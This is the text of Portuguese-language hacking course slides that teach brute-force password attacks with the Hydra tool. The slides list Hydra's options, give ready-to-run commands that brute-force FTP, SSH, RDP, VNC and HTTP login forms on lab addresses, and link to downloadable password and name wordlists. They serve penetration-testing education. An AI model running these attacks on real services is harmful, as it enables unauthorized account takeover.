Módulo 05 - Brute Force

Prévia do material em texto

O que temos pra hoje?
Temas de Hoje: •Brute Force
• Conhecendo Hydra
• Modos de Uso
• Atacando Serviços Padrão
• Atacando HTTP Post Form
• Brinde! Wordlists grátis
Técnicas de Invasão – Brute Force
Brute force com Hydra
Técnicas de Invasão – Brute Force
Hydra: Entendendo a ferramenta
O Hydra descobre senha através de brute-force (tentativa e erro), ele busca 
em wordlists, possíveis usuários/senhas e vai testando as combinações, uma a 
uma.
O Hydra tem suporte aos serviços Telnet, Formulário HTTP/HTTPS, SSH, MySQL, 
PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.
A ferramenta já vem toda instalada e configurada (inclusive com interface gráfica) 
no BackTrack, porém, caso não tenha instalado, basta fazer o download do código-
fonte e compilá-la em qualquer distribuição.
Técnicas de Invasão – Brute Force
Hydra: Entendendo a ferramenta
Opções da ferramenta:
-l = Nome/login da vítima;
-L = Carrega uma lista contendo nomes/logins de vítimas (1 por linha);
-p = Especifica senha única;
-P = Carrega uma lista com senhas (1 por linha);
-e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C = Usado para carregar um arquivo contendo usuário:senha. Formato 
usuário:senha equivale a - L/-P;
-M = Carrega lista de servidores alvos (1 por linha);
-o = Salva as senhas encontradas dentro do arquivo que você especificar;
-f = Faz o programa parar de trabalhar quando a senha ou usuário for 
encontrada[o];
-t = Limita o numero de solicitações por vez (default: 16);
-w = Define o tempo máximo em segundos para esperar resposta do servidor 
(default: 30s);
-v / -V = Modo verbose do programa. 'V' mostra todas tentativas.
Técnicas de Invasão – Brute Force
Hydra: Modo de Uso
Exemplos de uso:
Atacando serviços de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp
Atacando serviços SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando serviços RDP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 rdp
Atacando serviços VNC:
# hydra -L wordlist -P wordlist -v 192.168.2.100 vnc
Atacando websites com usuário e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Técnicas de Invasão – Brute Force
Hydra: Modo de Uso
Exemplos de uso:
Atacando serviços de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV
Atacando serviços SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando websites com usuário e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Técnicas de Invasão – Brute Force
Brinde: Wordlists
Seguem wordlists em Português e Inglês:
Dicionário da Lingua Portuguesa retirada do BROffice:
# http://www.esecurity.com.br/blackhat2/wordlists/dicionario.txt
Dicinário: Nomes masculinos e femininos (ENG):
# http://www.esecurity.com.br/blackhat2/wordlists/female-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/male-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/other-names.txt
Dicionário com senhas comuns:
# http://www.esecurity.com.br/blackhat2/wordlists/senhas-comuns.txt
Dicionário com palavras em Português + de 120.000 palavras:
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist-ptbr.txt
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist70k.txt
Dicionário baseada nas contas mais comuns criadas no Linux:
# http://www.esecurity.com.br/blackhat2/wordlists/etc-hosts.txt
Técnicas de Invasão – Brute Force
E-mail: alan.sanches@esecurity.com.br
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker
printf ("\Chega por hoje\n");
www.eSecurity.com.br
Técnicas de Invasão – Ataques à redes Wifi